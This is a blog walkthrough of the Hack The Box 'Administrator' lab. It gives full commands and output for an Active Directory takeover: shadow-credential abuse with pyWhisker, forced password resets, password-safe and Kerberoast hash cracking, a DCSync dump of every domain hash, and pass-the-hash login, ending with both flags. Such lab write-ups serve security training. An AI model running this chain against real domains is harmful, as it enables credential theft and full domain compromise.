Featured image of post Hack the Box - Administrator
Hack The Box

Hack the Box - Administrator

Walkthrough for the "Administrator" Hack the Box Challenge

Enumeration

First, as always, I edit the hosts file so that I don’t have to remember the IP of the room.

bash – Lukas Blog - Time for some coffee

┌─[root@htb-9c36twul9w][/home/nobrac]
└──╼ #cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	debian12-parrot

10.129.134.50 administrator.htb

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.0.1 localhost
127.0.1.1 htb-9c36twul9w htb-9c36twul9w.htb-cloud.com

NMAP Scan

I then perform an NMAP scan.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ nmap administrator.htb -vv -sV -sC
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-17 07:10 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Initiating Ping Scan at 07:10
Scanning administrator.htb (10.129.134.50) [4 ports]
Completed Ping Scan at 07:10, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:10
Scanning administrator.htb (10.129.134.50) [1000 ports]
Discovered open port 135/tcp on 10.129.134.50
Discovered open port 21/tcp on 10.129.134.50
Discovered open port 445/tcp on 10.129.134.50
Discovered open port 139/tcp on 10.129.134.50
Discovered open port 53/tcp on 10.129.134.50
Discovered open port 389/tcp on 10.129.134.50
Discovered open port 3268/tcp on 10.129.134.50
Discovered open port 88/tcp on 10.129.134.50
Discovered open port 593/tcp on 10.129.134.50
Discovered open port 636/tcp on 10.129.134.50
Discovered open port 3269/tcp on 10.129.134.50
Discovered open port 464/tcp on 10.129.134.50
Completed SYN Stealth Scan at 07:10, 0.18s elapsed (1000 total ports)
Initiating Service scan at 07:10
Scanning 12 services on administrator.htb (10.129.134.50)
Completed Service scan at 07:10, 6.47s elapsed (12 services on 1 host)
NSE: Script scanning 10.129.134.50.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 8.39s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.31s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Nmap scan report for administrator.htb (10.129.134.50)
Host is up, received echo-reply ttl 127 (0.0092s latency).
Scanned at 2024-11-17 07:10:24 CST for 16s
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       REASON          VERSION
21/tcp   open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-11-17 20:10:32Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m01s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 59010/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 59764/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 14437/udp): CLEAN (Timeout)
|   Check 4 (port 48871/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-11-17T20:10:34
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 07:10
Completed NSE at 07:10, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.71 seconds
           Raw packets sent: 1004 (44.152KB) | Rcvd: 1001 (40.076KB)

We received access data from Hack The Box in advance. The user is “olivia” and the corresponding password is “ichliebedich”.

I then used this access data to gather information via Netexec and WinRM.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ netexec smb administrator.htb -u Olivia -p 'ichliebedich' --shares
SMB         10.129.134.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.134.50   445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.129.134.50   445    DC               [*] Enumerated shares
SMB         10.129.134.50   445    DC               Share           Permissions     Remark
SMB         10.129.134.50   445    DC               -----           -----------     ------
SMB         10.129.134.50   445    DC               ADMIN$                          Remote Admin
SMB         10.129.134.50   445    DC               C$                              Default share
SMB         10.129.134.50   445    DC               IPC$            READ            Remote IPC
SMB         10.129.134.50   445    DC               NETLOGON        READ            Logon server share
SMB         10.129.134.50   445    DC               SYSVOL          READ            Logon server share
bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ netexec winrm administrator.htb -u olivia -p ichliebedich
WINRM       10.129.134.50   5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.129.134.50   5985   DC               [+] administrator.htb\olivia:ichliebedich (Pwn3d!)

Then I displayed the users within the domain.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/.nxc/logs]
└──╼ []$ rpcclient -U "Olivia%ichliebedich" administrator.htb -c "enumdomusers"user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[olivia] rid:[0x454]
user:[michael] rid:[0x455]
user:[benjamin] rid:[0x456]
user:[emily] rid:[0x458]
user:[ethan] rid:[0x459]
user:[alexander] rid:[0xe11]
user:[emma] rid:[0xe12]

Bloodhound

Netexec has a built-in Bloodhound collector. We use this to be able to do further enumeration with Bloodhound.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ netexec ldap 10.129.134.50 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.129.134.50
SMB         10.129.134.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP        10.129.134.50   389    DC               [+] administrator.htb\olivia:ichliebedich
LDAP        10.129.134.50   389    DC               Resolved collection methods: container, objectprops, localadmin, acl, rdp, trusts, psremote, dcom, session, group
LDAP        10.129.134.50   389    DC               Done in 00M 02S
LDAP        10.129.134.50   389    DC               Compressing output into /home/nobrac/.nxc/logs/DC_10.129.134.50_2024-11-17_072900_bloodhound.zip

Then I started the neo4j database and Bloodhound. I will not describe this in detail here, as there are enough instructions on the net or on the Github page of the products themselves. I then simply imported the ZIP file that I had previously generated with Netexec.

We see that the user “olivia” has the “GenericAll” authorizations for the user “michael” under “First Degree Object Control”. We can take advantage of this.

I then use the “pyWhisker” tool to add the “msDs-KeyCredentialLink” attribute to the user “michael” so that we can then change his password.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/.nxc/logs/pywhisker]
└──╼ []$ pywhisker -d "administrator.htb" -u "olivia" -p 'ichliebedich' --target "michael" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 3c36ecb6-19db-1f01-aa9b-2e6a933eaba1
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: We3AsZtq.pfx
[*] Must be used with password: K8dmwhwNaDKidqZ9SFsr
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

Login with Evil-WinRM and change password of user “michael”.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ evil-winrm -i administrator.htb -u olivia -p ichliebedich
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> net user michael Anfang2022! /DOMAIN
The command completed successfully.

In Bloodhound we can now see that the user “michael” has “ForcePasswordChange” authorizations for the user “benjamin”.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ net rpc password benjamin Anfang2022! -U administrator.htb/michael%Anfang2022! -S administrator.htb

WinRM login with the user “benjamin” was not possible. However, at the beginning I saw through the Nmap scan that port 21 is open. I tried to log in there with the user “olivia”, which was unfortunately not successful. With the user “benjamin” this was now successful and here I found a file of a password safe.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:root): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||53192|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||53194|)
125 Data connection already open; Transfer starting.
100% |***********************************|   952       98.02 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (96.83 KiB/s)

I use the “pwsafe2john” tool to save the hash of the file in the “pwsafe.hash” file and then I use the “john” tool to crack the password using the “rockyou.txt” wordlist.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ pwsafe2john Backup.psafe3 > pwsafe.hash
└──╼ []$ john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash
Using default input encoding: UTF-8e/wordlists/rockyou.txt pwsafe.hash 
Loaded 1 password hash (pwsafe, Password Safe [SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2024-11-17 08:22) 4.761g/s 39009p/s 39009c/s 39009C/s newzealand..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Then install the password manager (https://pwsafe.org/) so that we can open the file.

Here we will find further credentials for the domain.

In Bloodhound, we then see again that the user “emily” has the “GenericWrite” authorizations for the user “ethan”.

I then use the “pyWhisker” tool again.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ pywhisker -d administrator.htb -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb --target ethan --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 2809de27-3c2b-53d3-7f6c-f53f5f6f7dc2
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: EFMTLOlW.pfx
[*] Must be used with password: UJqsstyDLQCzUFIwWx9P
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

After using “pyWhisker”, I wanted to use the “targetedKerberoast” tool to retrieve the Kerberos hash from the user “ethan”. However, I always got the following error message.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ python targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Traceback (most recent call last):
  File "/home/nobrac/targetedKerberoast/targetedKerberoast.py", line 593, in main
    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(clientName=userName, password=args.auth_password, domain=args.auth_domain, lmhash=None, nthash=auth_nt_hash,
                                             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 323, in getKerberosTGT
    tgt = sendReceive(encoder.encode(asReq), domain, kdcHost)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket/krb5/kerberosv5.py", line 93, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

This indicates that the time difference is too great. I used the “rdate” tool to define the VM to be attacked as the time server.

bash – Lukas Blog - Time for some coffee

┌─[][root@htb-9c36twul9w][/home/nobrac]
└──╼ #rdate -n 10.129.134.50
Sun Nov 17 15:41:34 CST 2024

After this, it worked.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ python targetedKerberoast.py -v -d 'administrator.htb' -u emily -p UXLCI5iETUsIBoFVTj8yQFKoHjXmb
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$f6a8c4fc077ea365f771c427ca47a260$b529a971983a39d5b77d53122475213a850d43f4bb4957e7746565fbaecf95106d9f28b4fde89882e406c79427f6af58d5ac21cf2f67cef559ea5779395041d25b14d80b15b2829f0de935ae9a586aabd709e5bdbdaa2e6adfb0c8a4f10ef6a152e3fcc4479b385b541b3ae5b74d5b40558e445cef100d1e25ca5d0364c63c5953cae2ac6e18d1e3e4067e2443660da1a7f87a2336f816287455d734e58be5b2a07dcee975af0ee66117a418396f8d9ae52251143e753b589a687e6488a7e16a911f557df1dd1061d7475913963943ad7e567ae90ef26a1d2f9b2608ae0343105cc560b4e785f11d2b5772d771bc194ae7dccf779bf58add601b1e380f8fca71d6c4b509d73d3988b6bb1f62fd7a9729e9ee4049dba977e192e39576eca3ea818088d90cd96f8c1ffa1e5e93d82c0d542f11be630c6c98bc417ac5e053ca68dc88291f4426cdcd7abcc2836e91936eb1e7e275d511f85ededa9781508101e5f7fa551611989826d24716905815c8a906c64eb255550c8084930c16b85da88246d0ab47e257772fbf520c5e02a238e68f1a6312ebd3ce4532e9e2a6dd28869ec14bff344136ba3ac0df0bd6d8a617d9e8647fe0cd68502e1c53709e86ff20fd06cac84d381062b14ad4f19af6c8b411f3856ba21d5a524d039d5abe3e3401447473c3168071aa9b920462ad72b012d3699846ce8bdd98ae5eed4b13fb1c8cc21110227db239596b36791ebf72cd56a1155bbf17215b856be764c39602255eca427ab2045546255674ae0590f3dfbf3809348c950f1442e8c91bdaaea5d391e84e04c1b922b766a3e772d5d6f84ac518b8ef6014350cbd28e7b44de4fb1a45443f0036e1bc43f2049d92bffd7f370033605cde68e3ec30e8aabe3209039235f0e03b37b20e9ed2f68de4785e814c8b944b942a9458462016df561207256b887a9a164332002b775e7476fb0830891752ea5a541ee3825d7702dd95265459c39b7015f19044e157cb9cd105c9262606ba20ca8986d282e0de5cac48ab5c45d2ed946b75fb852ba16f6258e0842206a7ae6fe5e1e5ac4102ea5b2985796cf15d2f1928109cbb9edf86da4bf72738a7b091addc223748d0621f2c877a984385bd70ec247355fbd18e1480bd2e323df5ab5e3544f099bafa98b6171eee4722b5058430ea68060bcc14ebd45e0cdaf65d755e3ba965b3c5891ac92942fe92b8e424369b66e021bb6dccb3055d969256627f29642ca1d774dd231afd151fb4eb7045a205d906c33906e5894bdda1737c18ed939b4026a185a2491626bfd12dbdc3cacc0fdf5a9efdcbd3931cba029e56629e47c651dad444c60aab8d8513aba6f4a01db8e16e210b186cf496df8ad9614a66693d1d04468612f6294abab76e2fa45a4c4b59f2228dadabe9631823fea9ea02f14bd4a3deb69dd90699e5ef2587707c02c68c102d1824c3a313047666d3408b6c74806bb590e1669e9a06bb03e2ea236b045989b79633bdf4228db510dea6a5d1c4f3b2eaa4e86616ac1b2e21c441b275
[VERBOSE] SPN removed successfully for (ethan)

I then cracked the hash again with the help of “john” and the “rockyou.txt” wordlist.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ john --wordlist=/usr/share/wordlists/rockyou.txt ethan.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2024-11-17 15:44) 50.00g/s 256000p/s 256000c/s 256000C/s newzealand..babygrl
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Test the login with netexec and the cracked credentials.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~/targetedKerberoast]
└──╼ []$ netexec smb administrator.htb -u ethan -p limpbizkit
SMB         10.129.134.50   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.129.134.50   445    DC               [+] administrator.htb\ethan:limpbizkit

In Bloodhound we can see that the user “ethan” has the permissions “DCSync”.

Use the “impacket” tool to output all hashes.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ impacket-secretsdump administrator.htb/ethan:limpbizkit@administrator.htb
Impacket v0.13.0.dev0+20240916.171021.65b774d - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:f60d4512e66a84cd00127a50a1d26c79:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:f60d4512e66a84cd00127a50a1d26c79:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htb\olivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htb\olivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htb\olivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htb\michael:aes256-cts-hmac-sha1-96:b7c39960c41454fc13efb89049566ed59272e8fc961e85cfbde796209e667e63
administrator.htb\michael:aes128-cts-hmac-sha1-96:ba6db71728dfb70d432389892d109a41
administrator.htb\michael:des-cbc-md5:fdef4c259132f264
administrator.htb\benjamin:aes256-cts-hmac-sha1-96:b4b68260a6c909d38751e0dec33eb9ecdda468717260e15500b797da597b912f
administrator.htb\benjamin:aes128-cts-hmac-sha1-96:a287285e7e2f400f14123f4020d29db0
administrator.htb\benjamin:des-cbc-md5:bffd088fd3d6c797
administrator.htb\emily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htb\emily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htb\emily:des-cbc-md5:804343fb6e0dbc51
administrator.htb\ethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htb\ethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htb\ethan:des-cbc-md5:58387aef9d6754fb
administrator.htb\alexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htb\alexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htb\alexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htb\emma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htb\emma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htb\emma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

Log in with the administrator’s hash via WinRM.

bash – Lukas Blog - Time for some coffee

┌─[eu-dedivip-1][10.10.14.55][nobrac@htb-9c36twul9w][~]
└──╼ []$ evil-winrm -i administrator.htb -u Administrator -H 3dc553ce4b9fd20bd016e098d2d2fd2e
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        11/17/2024  12:03 PM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
383f762dbf31a12f114d632de874efc5

The user flag can be found on the desktop of the user “emily”.

bash – Lukas Blog - Time for some coffee

*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        10/22/2024  11:46 AM                Administrator
d-----        10/30/2024   2:25 PM                emily
d-----        11/17/2024   1:03 PM                michael
d-----        11/17/2024   1:02 PM                olivia
d-r---         10/4/2024  10:08 AM                Public


*Evil-WinRM* PS C:\Users> cd emily
*Evil-WinRM* PS C:\Users\emily> cd Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> ls


    Directory: C:\Users\emily\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---        11/17/2024  12:03 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
ad11aeaef4b06af8452244f7c218f352

That’s it for the room.

Hack the Box
Licensed under CC BY-NC-SA 4.0
Last updated on Nov 19, 2024 00:00 UTC
© 2023 - 2025 Lukas Blog - Time for some coffee
Servus.
Built with Hugo
Theme Stack designed by Jimmy